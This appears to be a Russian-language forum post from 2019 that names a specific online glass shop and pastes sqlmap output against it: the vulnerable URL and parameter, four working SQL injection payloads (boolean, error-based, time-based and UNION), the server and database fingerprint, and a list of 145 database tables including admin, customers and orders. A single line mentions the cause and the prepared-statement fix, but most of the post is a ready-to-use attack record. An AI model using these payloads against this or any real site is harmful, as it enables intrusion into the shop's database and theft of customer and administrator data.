
29.10.2019, 22:12
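glassofvenice.com — интернет-магазин.
Внутри много интересного. Судя по выводу ниже, значение параметра lp подставляется в строковый литерал SQL-запроса без экранирования; со стороны владельца это исправляется параметризованными запросами (prepared statements) и проверкой lp по списку существующих страниц.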
Код:
https://www.glassofvenice.com/landingpages.php?lp=murano-glass-beads&filters=36_10_38
Parameter: lp (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: lp=murano-glass-beads' AND 5931=5931 AND 'HFLm'='HFLm&filters=36_10_38
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: lp=murano-glass-beads' AND (SELECT 2228 FROM(SELECT COUNT(*),CONCAT(0x717a6b7a71,(SELECT (ELT(2228=2228,1))),0x7171766b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'rqhj'='rqhj&filters=36_10_38
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: lp=murano-glass-beads' AND SLEEP(5) AND 'AqWz'='AqWz&filters=36_10_38
Type: UNION query
Title: Generic UNION query (NULL) - 9 columns
Payload: lp=-8269' UNION ALL SELECT 53,53,53,53,53,53,CONCAT(0x717a6b7a71,0x4a61754d67545a515571454669416b6f567a4d68696c4c4b57546d4a4b4a434c7752545479434164,0x7171766b71),53,53-- lNAv&filters=36_10_38
---
web server operating system: Linux Debian 9.0 (stretch)
web application technology: Apache 2.4.25
back-end DBMS: MySQL >= 5.0
Database: glassdb
[145 tables]
+----------------------------------------------------+
| address_book |
| address_format |
| admin |
| admin_files |
| admin_groups |
| admin_logs |
| affiliate_affiliate |
| affiliate_banners |
| affiliate_banners_history |
| affiliate_clickthroughs |
| affiliate_news |
| affiliate_news_contents |
| affiliate_newsletters |
| affiliate_payment |
| affiliate_payment_status |
| affiliate_payment_status_history |
| affiliate_sales |
| amzn_orders |
| amzn_orders_items |
| amzn_products |
| amzn_products_description |
| amzn_products_report |
| amzn_reviews |
| amzn_seller_feedbacks |
| banners |
| banners_history |
| cache |
| cache_filters |
| cart_reminder |
| catalog_product_entity |
| categories |
| categories_description |
| configuration |
| configuration_group |
| contrib_tracker |
| counter |
| counter_history |
| countries |
| coupon_email_track |
| coupon_gv_customer |
| coupon_gv_queue |
| coupon_redeem_track |
| coupons |
| coupons_description |
| currencies |
| customer_entity |
| customers |
| customers_basket |
| customers_basket_attributes |
| customers_basket_info |
| customers_info |
| customers_points_pending |
| customers_temp |
| directory_country |
| directory_country_region |
| dos_protect |
| eav_attribute |
| eav_attribute_option |
| eav_attribute_option_value |
| emails_templates |
| etsy_products |
| etsy_products_images |
| etsy_taxonomies |
| filter_product_options |
| filter_products_attributes |
| filter_products_options_values |
| filter_products_options_values_to_products_options |
| geo_zones |
| giftwrap_options |
| google_checkout |
| google_configuration |
| google_orders |
| headertags |
| headertags_cache |
| headertags_default |
| headertags_pages |
| headertags_silo |
| inv_inventory_purchases |
| inv_model_xref |
| jet_orders |
| jet_orders_products |
| jet_returns |
| jet_returns_products |
| jet_returns_products_refund_amount |
| landing_pages |
| landing_pages_products |
| languages |
| mage_orders |
| mage_orders_products |
| manufacturers |
| manufacturers_info |
| newsletters |
| orders |
| orders_products |
| orders_products_attributes |
| orders_products_download |
| orders_status |
| orders_status_history |
| orders_status_history_transactions |
| orders_total |
| products |
| products_attributes |
| products_attributes_download |
| products_attributes_relations |
| products_attributes_sets |
| products_attributes_sets_elements |
| products_attributes_sets_to_products |
| products_description |
| products_extra_images |
| products_notifications |
| products_options |
| products_options_values |
| products_options_values_to_products_options |
| products_recommend |
| products_taxonomy_mapping |
| products_to_categories |
| products_variants |
| products_variants_images |
| products_variants_to_products_attributes |
| products_xsell |
| reviews |
| reviews_description |
| rma_return_reasons |
| scart |
| search_queries |
| search_queries_sorted |
| searchword_swap |
| sessions |
| sitemap_exclude |
| sliders |
| sliders_description |
| sliders_images |
| sliders_images_links |
| specials |
| tax_class |
| tax_rates |
| visitor |
| visual_verify_code |
| whos_online |
| wishlists |
| wishlists_products |
| wm_products |
| ws_products |
| zones |
| zones_to_geo_zones |
+----------------------------------------------------+